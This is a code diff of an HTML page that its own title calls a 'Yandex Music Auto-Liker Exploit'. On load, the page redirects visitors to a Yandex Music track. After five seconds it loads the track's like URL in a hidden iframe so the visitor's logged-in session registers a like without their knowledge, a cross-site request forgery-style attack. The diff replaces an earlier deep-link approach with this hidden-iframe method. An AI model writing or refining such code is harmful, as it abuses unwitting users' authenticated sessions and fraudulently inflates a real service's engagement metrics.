--- a/autoplaylikeyndx.html
+++ b/autoplaylikeyndx.html
@@ -1,45 +1,46 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <title>Yandex Music Auto-Exploit</title>
+    <title>Yandex Music Auto-Liker Exploit</title>
     <script type="text/javascript">
-        const TRACK_ID = "136101590";  // Target track ID
+        const TRACK_ID = "136101590";  
+        const WEB_LIKE_URL = `https://music.yandex.ru/track/${TRACK_ID}/like`;
+        const WEB_TRACK_URL = `https://music.yandex.ru/album/35390714/track/${TRACK_ID}?play=true`;
+        const DEEP_LINK = `yandexmusic://track/${TRACK_ID}?play=1`;
 
-        function likeTrackAutomatically() {
-            // If the user is already authenticated in the Yandex app, trigger the like action
-            // Yandex app automatically uses stored session/cookies to authorize the request
-            const deepLinkLike = `yandexmusic://track/${TRACK_ID}?action=like`;  // Hypothetical deep link for liking
-            window.location.href = deepLinkLike;  // Redirect to the Yandex Music app to like the song
-        }
-
-        function redirectToYandexMusic() {
+        function openYandexApp() {
             var userAgent = navigator.userAgent || navigator.vendor || window.opera;
-            var deepLinkPlay = `yandexmusic://track/${TRACK_ID}?play=1`;  // Deep link to play the track
-            var webLink = `https://music.yandex.ru/album/35390714/track/${TRACK_ID}?play=true`;  // Web fallback
-
-            // Step 1: Redirect user to Yandex Music app to play the track
+            
             if (/iPad|iPhone|iPod/.test(userAgent) && !window.MSStream) {
-                setTimeout(() => { window.location.href = webLink; }, 1500);  // Fallback if deep link fails
-                window.location.href = deepLinkPlay;
-            } 
-            else if (/android/i.test(userAgent)) {
-                setTimeout(() => { window.location.href = webLink; }, 1500);  // Fallback if deep link fails
-                window.location.href = deepLinkPlay;
-            } 
-            else {
-                window.location.href = webLink;  // Fallback for desktop users
+                setTimeout(() => { window.location.href = WEB_TRACK_URL; }, 1500);
+                window.location.href = DEEP_LINK;
+            } else if (/android/i.test(userAgent)) {
+                setTimeout(() => { window.location.href = WEB_TRACK_URL; }, 1500);
+                window.location.href = DEEP_LINK;
+            } else {
+                window.location.href = WEB_TRACK_URL;
             }
 
-            // Step 2: Delay auto-liking for a few seconds to ensure playback starts first
-            setTimeout(likeTrackAutomatically, 5000);  // Trigger like action after 5 seconds
+            // Delay auto-liking to ensure session tokens are active
+            setTimeout(autoLikeInBrowser, 5000);
+        }
+
+        function autoLikeInBrowser() {
+            // Open the like URL in a new hidden iframe to trigger auto-like
+            let likeFrame = document.createElement("iframe");
+            likeFrame.style.display = "none";
+            likeFrame.src = WEB_LIKE_URL;
+            document.body.appendChild(likeFrame);
+
+            console.log("✅ Sent like request via hidden iframe");
         }
 
         function executeHack() {
-            redirectToYandexMusic();  // Redirect to play the track
+            openYandexApp();
         }
     </script>
 </head>
 <body onload="executeHack()">
-    <p>Redirecting to Yandex Music Track...</p>
+    <p>Redirecting to Yandex Music...</p>
 </body>
 </html>
